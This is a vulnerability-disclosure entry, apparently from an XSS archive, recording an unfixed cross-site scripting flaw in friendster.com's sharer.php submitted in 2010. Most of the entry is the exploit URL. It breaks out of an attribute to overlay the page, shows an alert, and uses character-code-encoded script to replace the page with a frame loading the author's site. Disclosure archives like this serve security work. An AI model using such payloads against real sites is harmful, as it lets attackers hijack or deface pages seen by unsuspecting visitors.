Security researcher CrazyDaVinci, has submitted on 15/05/2010 a cross-site-scripting (XSS) vulnerability affecting www.friendster.com, which at the time of submission ranked 972 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 01/04/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
| Date submitted: 15/05/2010 |
Date published: 01/04/2011 |
Fixed? Mail us! | Status:  UNFIXED |
| Author: CrazyDaVinci |
Domain: www.friendster.com |
Category: XSS |
Pagerank: 972 |
|---|
URL: http://www.friendster.com/sharer.php?u=http%3A%2F%2Fcrazydavinci.net%2F%22%20target=%22_blank%22%20s
tyle=%22background:black%20url%28http://crazydavinci.info/komen/komen29.jpg%29;color:black;z-index:6
66666;position:absolute;top:0;left:0;width:6666px;height:6666px%22%20onmouseover=%22alert%28%27XSSed
%20By%20CrazyDaVinci%27%29;location=%27javascript:document.write%28String.fromCharCode%2860,116,105,
116,108,101,62,70,114,105,101,110,100,115,116,101,114,32,124,32,88,83,83,101,100,32,66,121,32,67,114
,97,122,121,68,97,86,105,110,99,105,60,47,116,105,116,108,101,62,13,10,60,102,114,97,109,101,115,101
,116,32,114,111,119,115,61,34,49,48,48,37,44,42,34,32,102,114,97,109,101,98,111,114,100,101,114,61,3
4,78,79,34,32,98,111,114,100,101,114,61,34,48,34,32,102,114,97,109,101,115,112,97,99,105,110,103,61,
34,48,34,62,60,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,99,114,97,122,121,100
,97,118,105,110,99,105,46,110,101,116,47,34,62,60,47,102,114,97,109,101,115,101,116,62%29%29;documen
t.close%28%29;void%280%29%27&t=%A0 |
|
Click here to view the mirror
|
|
|
